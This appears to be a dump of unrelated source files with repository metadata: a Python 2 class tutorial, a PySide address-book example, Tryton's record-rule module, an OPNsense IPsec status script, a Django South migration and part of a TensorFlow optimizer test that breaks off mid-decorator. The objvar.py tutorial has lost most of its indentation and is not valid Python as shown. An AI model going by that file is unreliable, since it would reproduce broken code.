brucework/demo | src/python/hello/objvar.py | 1 | 1332 | #!/usr/bin/python
#Filename: objvar.py
class Person:
"'Represents a person.'"
population = 0
def __init__(self, name):
        '''Initializes the person's data.'''
self.name = name
print '(Initializing %s)'% self.name
#When this person is created, he/she
#adds to the population
Person.population += 1
def __del__(self):
"I am dying."
print '%s says bye.' %self.name
Person.population -= 1
if Person.population == 0:
print 'I am the last one.'
else:
print 'There are still %d people left.'%Person.population
def sayHi(self):
'''Greeting by the person.
Really, that's all it does.'''
print 'Hi, my name is %s.'%self.name
def howMany(self):
'''Prints the current population.'''
if Person.population == 1:
print 'I am the only person here.'
else:
            print 'We have %d persons here.' % Person.population
swaroop = Person('Swaroop')
swaroop.sayHi()
swaroop.howMany()
bruce = Person('bruce A')
bruce.sayHi()
bruce.howMany()
test = Person('test 120')
test.sayHi()
test.howMany()
del test
kalam = Person('A bdul K alam')
kalam.sayHi()
kalam.howMany()
del swaroop
del bruce
del kalam
#swaroop.sayHi()
#swaroop.howMany()
| gpl-3.0 | 8,220,158,943,830,193,000 | 19.492308 | 69 | 0.583333 | false |
Southpaw-TACTIC/Team | src/python/Lib/site-packages/PySide/examples/tutorials/addressbook/part4.py | 1 | 9061 | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2009 Nokia Corporation and/or its subsidiary(-ies).
## Contact: Qt Software Information ([email protected])
##
## This file is part of the example classes of the Qt Toolkit.
##
#############################################################################
from PySide import QtCore, QtGui
class SortedDict(dict):
class Iterator(object):
def __init__(self, sorted_dict):
self._dict = sorted_dict
self._keys = sorted(self._dict.keys())
self._nr_items = len(self._keys)
self._idx = 0
def __iter__(self):
return self
def next(self):
if self._idx >= self._nr_items:
raise StopIteration
key = self._keys[self._idx]
value = self._dict[key]
self._idx += 1
return key, value
__next__ = next
def __iter__(self):
return SortedDict.Iterator(self)
iterkeys = __iter__
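    # Iterating a SortedDict yields (key, value) pairs in key order, which is
    # what lets AddressBook.next()/previous() walk the contacts
    # alphabetically.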
class AddressBook(QtGui.QWidget):
NavigationMode, AddingMode, EditingMode = range(3)
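    # The widget runs in one of three modes: browsing existing contacts
    # (NavigationMode), entering a new one (AddingMode) or changing the one
    # currently shown (EditingMode); updateInterface() switches the buttons
    # and fields accordingly.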
def __init__(self, parent=None):
super(AddressBook, self).__init__(parent)
self.contacts = SortedDict()
self.oldName = ''
self.oldAddress = ''
self.currentMode = self.NavigationMode
nameLabel = QtGui.QLabel("Name:")
self.nameLine = QtGui.QLineEdit()
self.nameLine.setReadOnly(True)
addressLabel = QtGui.QLabel("Address:")
self.addressText = QtGui.QTextEdit()
self.addressText.setReadOnly(True)
self.addButton = QtGui.QPushButton("&Add")
self.addButton.show()
self.editButton = QtGui.QPushButton("&Edit")
self.editButton.setEnabled(False)
self.removeButton = QtGui.QPushButton("&Remove")
self.removeButton.setEnabled(False)
self.submitButton = QtGui.QPushButton("&Submit")
self.submitButton.hide()
self.cancelButton = QtGui.QPushButton("&Cancel")
self.cancelButton.hide()
self.nextButton = QtGui.QPushButton("&Next")
self.nextButton.setEnabled(False)
self.previousButton = QtGui.QPushButton("&Previous")
self.previousButton.setEnabled(False)
self.addButton.clicked.connect(self.addContact)
self.submitButton.clicked.connect(self.submitContact)
self.editButton.clicked.connect(self.editContact)
self.removeButton.clicked.connect(self.removeContact)
self.cancelButton.clicked.connect(self.cancel)
self.nextButton.clicked.connect(self.next)
self.previousButton.clicked.connect(self.previous)
buttonLayout1 = QtGui.QVBoxLayout()
buttonLayout1.addWidget(self.addButton)
buttonLayout1.addWidget(self.editButton)
buttonLayout1.addWidget(self.removeButton)
buttonLayout1.addWidget(self.submitButton)
buttonLayout1.addWidget(self.cancelButton)
buttonLayout1.addStretch()
buttonLayout2 = QtGui.QHBoxLayout()
buttonLayout2.addWidget(self.previousButton)
buttonLayout2.addWidget(self.nextButton)
mainLayout = QtGui.QGridLayout()
mainLayout.addWidget(nameLabel, 0, 0)
mainLayout.addWidget(self.nameLine, 0, 1)
mainLayout.addWidget(addressLabel, 1, 0, QtCore.Qt.AlignTop)
mainLayout.addWidget(self.addressText, 1, 1)
mainLayout.addLayout(buttonLayout1, 1, 2)
mainLayout.addLayout(buttonLayout2, 3, 1)
self.setLayout(mainLayout)
self.setWindowTitle("Simple Address Book")
def addContact(self):
self.oldName = self.nameLine.text()
self.oldAddress = self.addressText.toPlainText()
self.nameLine.clear()
self.addressText.clear()
self.updateInterface(self.AddingMode)
def editContact(self):
self.oldName = self.nameLine.text()
self.oldAddress = self.addressText.toPlainText()
self.updateInterface(self.EditingMode)
def submitContact(self):
name = self.nameLine.text()
address = self.addressText.toPlainText()
if name == "" or address == "":
QtGui.QMessageBox.information(self, "Empty Field",
"Please enter a name and address.")
return
if self.currentMode == self.AddingMode:
if name not in self.contacts:
self.contacts[name] = address
QtGui.QMessageBox.information(self, "Add Successful",
"\"%s\" has been added to your address book." % name)
else:
QtGui.QMessageBox.information(self, "Add Unsuccessful",
"Sorry, \"%s\" is already in your address book." % name)
return
elif self.currentMode == self.EditingMode:
if self.oldName != name:
if name not in self.contacts:
QtGui.QMessageBox.information(self, "Edit Successful",
"\"%s\" has been edited in your address book." % self.oldName)
del self.contacts[self.oldName]
self.contacts[name] = address
else:
QtGui.QMessageBox.information(self, "Edit Unsuccessful",
"Sorry, \"%s\" is already in your address book." % name)
return
elif self.oldAddress != address:
QtGui.QMessageBox.information(self, "Edit Successful",
"\"%s\" has been edited in your address book." % name)
self.contacts[name] = address
self.updateInterface(self.NavigationMode)
def cancel(self):
self.nameLine.setText(self.oldName)
self.addressText.setText(self.oldAddress)
self.updateInterface(self.NavigationMode)
def removeContact(self):
name = self.nameLine.text()
address = self.addressText.toPlainText()
if name in self.contacts:
button = QtGui.QMessageBox.question(self, "Confirm Remove",
"Are you sure you want to remove \"%s\"?" % name,
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
if button == QtGui.QMessageBox.Yes:
self.previous()
del self.contacts[name]
QtGui.QMessageBox.information(self, "Remove Successful",
"\"%s\" has been removed from your address book." % name)
self.updateInterface(self.NavigationMode)
def next(self):
name = self.nameLine.text()
it = iter(self.contacts)
try:
while True:
this_name, _ = it.next()
if this_name == name:
next_name, next_address = it.next()
break
except StopIteration:
next_name, next_address = iter(self.contacts).next()
self.nameLine.setText(next_name)
self.addressText.setText(next_address)
def previous(self):
name = self.nameLine.text()
prev_name = prev_address = None
for this_name, this_address in self.contacts:
if this_name == name:
break
prev_name = this_name
prev_address = this_address
else:
self.nameLine.clear()
self.addressText.clear()
return
if prev_name is None:
for prev_name, prev_address in self.contacts:
pass
self.nameLine.setText(prev_name)
self.addressText.setText(prev_address)
def updateInterface(self, mode):
self.currentMode = mode
if self.currentMode in (self.AddingMode, self.EditingMode):
self.nameLine.setReadOnly(False)
self.nameLine.setFocus(QtCore.Qt.OtherFocusReason)
self.addressText.setReadOnly(False)
self.addButton.setEnabled(False)
self.editButton.setEnabled(False)
self.removeButton.setEnabled(False)
self.nextButton.setEnabled(False)
self.previousButton.setEnabled(False)
self.submitButton.show()
self.cancelButton.show()
elif self.currentMode == self.NavigationMode:
if not self.contacts:
self.nameLine.clear()
self.addressText.clear()
self.nameLine.setReadOnly(True)
self.addressText.setReadOnly(True)
self.addButton.setEnabled(True)
number = len(self.contacts)
self.editButton.setEnabled(number >= 1)
self.removeButton.setEnabled(number >= 1)
self.nextButton.setEnabled(number > 1)
self.previousButton.setEnabled(number >1 )
self.submitButton.hide()
self.cancelButton.hide()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
addressBook = AddressBook()
addressBook.show()
sys.exit(app.exec_())
| epl-1.0 | 8,617,441,876,815,813,000 | 32.684015 | 90 | 0.584152 | false |
kret0s/gnuhealth-live | tryton/server/trytond-3.8.3/trytond/ir/rule.py | 1 | 10814 | # This file is part of Tryton. The COPYRIGHT file at the top level of
# this repository contains the full copyright notices and license terms.
from ..model import ModelView, ModelSQL, fields, EvalEnvironment, Check
from ..transaction import Transaction
from ..cache import Cache
from ..pool import Pool
from .. import backend
from ..pyson import PYSONDecoder
__all__ = [
'RuleGroup', 'Rule',
]
class RuleGroup(ModelSQL, ModelView):
"Rule group"
__name__ = 'ir.rule.group'
name = fields.Char('Name', select=True)
model = fields.Many2One('ir.model', 'Model', select=True,
required=True)
global_p = fields.Boolean('Global', select=True,
help="Make the rule global \nso every users must follow this rule")
default_p = fields.Boolean('Default', select=True,
help="Add this rule to all users by default")
rules = fields.One2Many('ir.rule', 'rule_group', 'Tests',
help="The rule is satisfied if at least one test is True")
groups = fields.Many2Many('ir.rule.group-res.group',
'rule_group', 'group', 'Groups')
# TODO remove to only use groups
users = fields.Many2Many('ir.rule.group-res.user',
'rule_group', 'user', 'Users')
perm_read = fields.Boolean('Read Access')
perm_write = fields.Boolean('Write Access')
perm_create = fields.Boolean('Create Access')
perm_delete = fields.Boolean('Delete Access')
@classmethod
def __setup__(cls):
super(RuleGroup, cls).__setup__()
cls._order.insert(0, ('model', 'ASC'))
cls._order.insert(1, ('global_p', 'ASC'))
cls._order.insert(2, ('default_p', 'ASC'))
t = cls.__table__()
cls._sql_constraints += [
('global_default_exclusive',
Check(t, (t.global_p == False) | (t.default_p == False)),
'Global and Default are mutually exclusive!'),
]
@staticmethod
def default_global_p():
return True
@staticmethod
def default_default_p():
return False
@staticmethod
def default_perm_read():
return True
@staticmethod
def default_perm_write():
return True
@staticmethod
def default_perm_create():
return True
@staticmethod
def default_perm_delete():
return True
@classmethod
def delete(cls, groups):
super(RuleGroup, cls).delete(groups)
# Restart the cache on the domain_get method of ir.rule
Pool().get('ir.rule')._domain_get_cache.clear()
@classmethod
def create(cls, vlist):
res = super(RuleGroup, cls).create(vlist)
# Restart the cache on the domain_get method of ir.rule
Pool().get('ir.rule')._domain_get_cache.clear()
return res
@classmethod
def write(cls, groups, vals, *args):
super(RuleGroup, cls).write(groups, vals, *args)
# Restart the cache on the domain_get method of ir.rule
Pool().get('ir.rule')._domain_get_cache.clear()
class Rule(ModelSQL, ModelView):
"Rule"
__name__ = 'ir.rule'
rule_group = fields.Many2One('ir.rule.group', 'Group', select=True,
required=True, ondelete="CASCADE")
domain = fields.Char('Domain', required=True,
help='Domain is evaluated with a PYSON context containing:\n'
'- "user" as the current user')
_domain_get_cache = Cache('ir_rule.domain_get', context=False)
@classmethod
def __setup__(cls):
super(Rule, cls).__setup__()
cls._error_messages.update({
'invalid_domain': 'Invalid domain in rule "%s".',
})
@classmethod
def __register__(cls, module_name):
TableHandler = backend.get('TableHandler')
super(Rule, cls).__register__(module_name)
table = TableHandler(Transaction().cursor, cls, module_name)
# Migration from 2.6: replace field, operator and operand by domain
table.not_null_action('field', action='remove')
table.not_null_action('operator', action='remove')
table.not_null_action('operand', action='remove')
@classmethod
def validate(cls, rules):
super(Rule, cls).validate(rules)
cls.check_domain(rules)
@classmethod
def check_domain(cls, rules):
ctx = cls._get_context()
for rule in rules:
try:
value = PYSONDecoder(ctx).decode(rule.domain)
except Exception:
cls.raise_user_error('invalid_domain', (rule.rec_name,))
if not isinstance(value, list):
cls.raise_user_error('invalid_domain', (rule.rec_name,))
else:
try:
fields.domain_validate(value)
except Exception:
cls.raise_user_error('invalid_domain', (rule.rec_name,))
@staticmethod
def _get_context():
User = Pool().get('res.user')
user_id = Transaction().user
with Transaction().set_context(_check_access=False, _datetime=None):
user = EvalEnvironment(User(user_id), User)
return {
'user': user,
}
@staticmethod
def _get_cache_key():
# _datetime value will be added to the domain
return (Transaction().user, Transaction().context.get('_datetime'))
@classmethod
def domain_get(cls, model_name, mode='read'):
assert mode in ['read', 'write', 'create', 'delete'], \
'Invalid domain mode for security'
# root user above constraint
if Transaction().user == 0:
if not Transaction().context.get('user'):
return
with Transaction().set_user(Transaction().context['user']):
return cls.domain_get(model_name, mode=mode)
key = (model_name, mode) + cls._get_cache_key()
domain = cls._domain_get_cache.get(key, False)
if domain is not False:
return domain
pool = Pool()
RuleGroup = pool.get('ir.rule.group')
Model = pool.get('ir.model')
RuleGroup_User = pool.get('ir.rule.group-res.user')
RuleGroup_Group = pool.get('ir.rule.group-res.group')
User_Group = pool.get('res.user-res.group')
cursor = Transaction().cursor
rule_table = cls.__table__()
rule_group = RuleGroup.__table__()
rule_group_user = RuleGroup_User.__table__()
rule_group_group = RuleGroup_Group.__table__()
user_group = User_Group.__table__()
model = Model.__table__()
user_id = Transaction().user
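        # The query below collects every rule id that applies to this user
        # for the requested model and access mode: rules reachable through a
        # direct user link or a group membership, plus rule groups flagged as
        # default or global.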
cursor.execute(*rule_table.join(rule_group,
condition=rule_group.id == rule_table.rule_group
).join(model,
condition=rule_group.model == model.id
).select(rule_table.id,
where=(model.model == model_name)
& (getattr(rule_group, 'perm_%s' % mode) == True)
& (rule_group.id.in_(
rule_group_user.select(rule_group_user.rule_group,
where=rule_group_user.user == user_id)
| rule_group_group.join(
user_group,
condition=(rule_group_group.group
== user_group.group)
).select(rule_group_group.rule_group,
where=user_group.user == user_id)
)
| (rule_group.default_p == True)
| (rule_group.global_p == True)
)))
ids = [x[0] for x in cursor.fetchall()]
if not ids:
cls._domain_get_cache.set(key, None)
return
clause = {}
clause_global = {}
ctx = cls._get_context()
# Use root user without context to prevent recursion
with Transaction().set_user(0), \
Transaction().set_context(user=0):
for rule in cls.browse(ids):
assert rule.domain, ('Rule domain empty,'
'check if migration was done')
dom = PYSONDecoder(ctx).decode(rule.domain)
if rule.rule_group.global_p:
clause_global.setdefault(rule.rule_group.id, ['OR'])
clause_global[rule.rule_group.id].append(dom)
else:
clause.setdefault(rule.rule_group.id, ['OR'])
clause[rule.rule_group.id].append(dom)
# Test if there is no rule_group that have no rule
cursor.execute(*rule_group.join(model,
condition=rule_group.model == model.id
).select(rule_group.id,
where=(model.model == model_name)
& ~rule_group.id.in_(rule_table.select(rule_table.rule_group))
& rule_group.id.in_(rule_group_user.select(
rule_group_user.rule_group,
where=rule_group_user.user == user_id)
| rule_group_group.join(user_group,
condition=rule_group_group.group == user_group.group
).select(rule_group_group.rule_group,
where=user_group.user == user_id))))
fetchone = cursor.fetchone()
if fetchone:
group_id = fetchone[0]
clause[group_id] = []
clause = clause.values()
if clause:
clause.insert(0, 'OR')
clause_global = clause_global.values()
if clause_global:
clause_global.insert(0, 'AND')
if clause and clause_global:
clause = ['AND', clause_global, clause]
elif clause_global:
clause = clause_global
cls._domain_get_cache.set(key, clause)
return clause
@classmethod
def query_get(cls, model_name, mode='read'):
pool = Pool()
Model = pool.get(model_name)
domain = cls.domain_get(model_name, mode=mode)
# Use root to prevent infinite recursion
with Transaction().set_user(0), \
Transaction().set_context(active_test=False, user=0):
return Model.search(domain, order=[], query=True)
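    # Rough usage sketch (not part of this module): callers typically fetch
    # the rule domain for a model and combine it with their own search
    # criteria; the model name below is only an illustrative example.
    #
    #     Rule = Pool().get('ir.rule')
    #     rule_domain = Rule.domain_get('res.partner', mode='read')
    #     # domain_get returns None when no record rule applies to the
    #     # current user, otherwise a domain clause usable in a search.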
@classmethod
def delete(cls, rules):
super(Rule, cls).delete(rules)
# Restart the cache on the domain_get method of ir.rule
cls._domain_get_cache.clear()
@classmethod
def create(cls, vlist):
res = super(Rule, cls).create(vlist)
# Restart the cache on the domain_get method of ir.rule
cls._domain_get_cache.clear()
return res
@classmethod
def write(cls, rules, vals, *args):
super(Rule, cls).write(rules, vals, *args)
# Restart the cache on the domain_get method
cls._domain_get_cache.clear()
| gpl-3.0 | 1,320,602,009,460,516,000 | 35.657627 | 78 | 0.561309 | false |
opnsense/core | src/opnsense/scripts/ipsec/list_status.py | 1 | 3842 | #!/usr/local/bin/python3
"""
Copyright (c) 2015-2019 Ad Schellevis <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
list ipsec status, using vici interface
"""
import sys
import socket
import ujson
import vici
try:
s = vici.Session()
except socket.error:
# cannot connect to session, strongswan not running?
print ('ipsec not active')
sys.exit(0)
def parse_sa(in_conn):
result = {'local-addrs': '', 'remote-addrs': '', 'children': '', 'local-id': '', 'remote-id': ''}
result['version'] = in_conn['version']
if 'local_addrs' in in_conn:
result['local-addrs'] = b','.join(in_conn['local_addrs'])
elif 'local-host' in in_conn:
result['local-addrs'] = in_conn['local-host']
if 'remote_addrs' in in_conn:
result['remote-addrs'] = b','.join(in_conn['remote_addrs'])
elif 'remote-host' in in_conn:
result['remote-addrs'] = in_conn['remote-host']
if 'children' in in_conn:
result['children'] = in_conn['children']
result['sas'] = []
return result
result = dict()
# parse connections
for conns in s.list_conns():
for connection_id in conns:
result[connection_id] = parse_sa(conns[connection_id])
result[connection_id]['routed'] = True
result[connection_id]['local-class'] = []
result[connection_id]['remote-class'] = []
# parse local-% and remote-% keys
for connKey in conns[connection_id].keys():
if connKey.find('local-') == 0:
if 'id' in conns[connection_id][connKey]:
result[connection_id]['local-id'] = conns[connection_id][connKey]['id']
result[connection_id]['local-class'].append(conns[connection_id][connKey]['class'])
elif connKey.find('remote-') == 0:
if 'id' in conns[connection_id][connKey]:
result[connection_id]['remote-id'] = conns[connection_id][connKey]['id']
result[connection_id]['remote-class'].append(conns[connection_id][connKey]['class'])
result[connection_id]['local-class'] = b'+'.join(result[connection_id]['local-class'])
result[connection_id]['remote-class'] = b'+'.join(result[connection_id]['remote-class'])
# attach Security Associations
for sas in s.list_sas():
for sa in sas:
if sa not in result:
result[sa] = parse_sa(sas[sa])
result[sa]['routed'] = False
result[sa]['sas'].append(sas[sa])
print (ujson.dumps(result, reject_bytes=False))
| bsd-2-clause | -7,422,858,684,513,032,000 | 41.688889 | 101 | 0.640552 | false |
ddalex/p9 | sign/migrations/0007_auto__add_field_channel_description.py | 1 | 7738 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Channel.description'
db.add_column(u'sign_channel', 'description',
self.gf('django.db.models.fields.TextField')(null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Channel.description'
db.delete_column(u'sign_channel', 'description')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sign.channel': {
'Meta': {'object_name': 'Channel'},
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'master': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Client']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
u'sign.channelrelay': {
'Meta': {'object_name': 'ChannelRelay'},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Channel']"}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Client']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'sign.client': {
'Meta': {'object_name': 'Client'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'externid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'useragent': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'})
},
u'sign.clientlog': {
'Meta': {'object_name': 'ClientLog'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Client']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'log': ('django.db.models.fields.TextField', [], {}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'sign.feedback': {
'Meta': {'object_name': 'Feedback'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'blank': 'True'}),
'useragent': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'useremail': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'usertext': ('django.db.models.fields.TextField', [], {})
},
u'sign.message': {
'Meta': {'object_name': 'Message'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Client']"}),
'content': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'created': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msgtype': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'recipient'", 'to': u"orm['sign.Client']"})
}
}
complete_apps = ['sign'] | mit | -8,665,449,170,731,710,000 | 66.295652 | 187 | 0.544456 | false |
Intel-Corporation/tensorflow | tensorflow/python/distribute/minimize_loss_test.py | 1 | 22211 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for running legacy optimizer code with DistributionStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute.single_loss_example import batchnorm_example
from tensorflow.python.distribute.single_loss_example import minimize_loss_example
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.layers import core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.ops.losses import losses_impl
VAR_MAP_V1 = {
"GradientDescent": ("dense/kernel", "dense/bias"),
"Adagrad": ("dense/kernel/Adagrad", "dense/kernel", "dense/bias/Adagrad",
"dense/bias")
}
VAR_MAP_V2 = {
"SGD": ("dense/bias", "learning_rate", "decay", "iter", "dense/kernel",
"momentum"),
"Adagrad": ("iter", "epsilon", "dense/bias", "dense/kernel",
"learning_rate", "decay", "dense/kernel/accumulator",
"dense/bias/accumulator")
}
class MinimizeLossStepTest(test.TestCase, parameterized.TestCase):
def _get_iterator(self, strategy, input_fn):
iterator = strategy.make_input_fn_iterator(lambda _: input_fn())
self.evaluate(iterator.initialize())
return iterator
@combinations.generate(
combinations.times(
strategy_combinations.distributions_and_v1_optimizers(),
combinations.combine(mode=["graph"], use_callable_loss=[True, False])
+ combinations.combine(mode=["eager"], use_callable_loss=[True])) +
combinations.times(
strategy_combinations.distributions_and_v2_optimizers(),
combinations.combine(
mode=["graph", "eager"], use_callable_loss=[True])) +
combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v2,
mode=["graph"],
use_callable_loss=[True]) + combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v1,
mode=["graph"],
use_callable_loss=[True, False]))
def testTrainNetwork(self, distribution, optimizer_fn, use_callable_loss):
with distribution.scope():
model_fn, dataset_fn, layer = minimize_loss_example(
optimizer_fn, use_bias=True, use_callable_loss=use_callable_loss)
def step_fn(ctx, inputs):
del ctx # Unused
return distribution.group(
distribution.extended.call_for_each_replica(
model_fn, args=(inputs,)))
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=2).run_op
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
weights, biases = [], []
for _ in range(5):
run_step()
weights.append(self.evaluate(layer.kernel))
biases.append(self.evaluate(layer.bias))
error = abs(numpy.add(numpy.squeeze(weights), numpy.squeeze(biases)) - 1)
is_not_increasing = all(y <= x for x, y in zip(error, error[1:]))
self.assertTrue(is_not_increasing)
@combinations.generate(
combinations.times(
strategy_combinations.distributions_and_v1_optimizers(),
combinations.combine(mode=["graph"], use_callable_loss=[True, False])
+ combinations.combine(mode=["eager"], use_callable_loss=[True])) +
combinations.times(
strategy_combinations.distributions_and_v2_optimizers(),
combinations.combine(
mode=["graph", "eager"], use_callable_loss=[True])))
def testTrainNetworkByCallForEachReplica(self, distribution, optimizer_fn,
use_callable_loss):
with distribution.scope():
model_fn, dataset_fn, layer = minimize_loss_example(
optimizer_fn, use_bias=True, use_callable_loss=use_callable_loss)
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.group(
distribution.extended.call_for_each_replica(
model_fn, args=(iterator.get_next(),)))
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
weights, biases = [], []
for _ in range(10):
run_step()
weights.append(self.evaluate(layer.kernel))
biases.append(self.evaluate(layer.bias))
error = abs(numpy.add(numpy.squeeze(weights), numpy.squeeze(biases)) - 1)
is_not_increasing = all(y <= x for x, y in zip(error, error[1:]))
self.assertTrue(is_not_increasing)
@combinations.generate(
